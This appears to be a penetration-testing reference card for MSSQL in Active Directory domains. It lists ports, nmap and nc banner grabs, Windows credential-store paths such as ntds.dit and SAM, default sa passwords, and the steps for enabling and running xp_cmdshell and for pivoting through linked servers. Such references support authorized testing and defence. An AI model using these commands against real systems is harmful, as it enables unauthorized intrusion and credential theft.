MSSQL in AD Environments
AD MSSQLMSSQL DomainLinked SQL Server
MSSQL in Active Directory environments uses integrated authentication and linked servers, enabling lateral movement across the domain via database links.
Ports
| Port | Protocol | Description |
|---|---|---|
| 1433 | tcp | MSSQL |
| 445 | tcp | SMB |
| 88 | tcp | Kerberos |
Fingerprints
| Banner / Probe | Expected Response |
|---|---|
nmap -sV -p <port> <target> | Service banner and version info |
nc -nv <target> <port> | Raw banner grab |
Key Files
| Path | Description |
|---|---|
C:\Windows\NTDS\ntds.dit | AD database with all password hashes |
C:\Windows\System32\config\SAM | Local SAM password hashes |
C:\Windows\System32\config\SYSTEM | System hive (boot key for hash decryption) |
C:\Windows\System32\config\SECURITY | Security policy and cached domain credentials |
%USERPROFILE%\AppData\Roaming\Microsoft\Credentials\ | Saved Windows credentials |
Default Credentials
| Username | Password | Context |
|---|---|---|
sa | (empty) | SQL Server system admin |
sa | Password123 | Common test password |
Known CVEs
| Identifier | Type | Description |
|---|---|---|
— | Auth | Weak SA password / default SA creds |
Exploitation Primitives
| Technique | Tool / Command | Result |
|---|---|---|
| Impersonate SA | sqsh -S <target> -U sa | Connect as sysadmin |
| xp_cmdshell RCE | EXEC xp_cmdshell 'whoami' | RCE via xp_cmdshell |
| Linked Server | EXEC sp_linkedservers | Pivot through linked servers |
Notes
xp_cmdshell is disabled by default in modern SQL Server. Enable it with:
`EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;`
Linked servers in AD environments are a goldmine for lateral movement.
Tools: `sqsh`, `impacket-mssqlclient`, `netexec mssql`.
Seen on
ShodanCensysFOFAZoomEye
References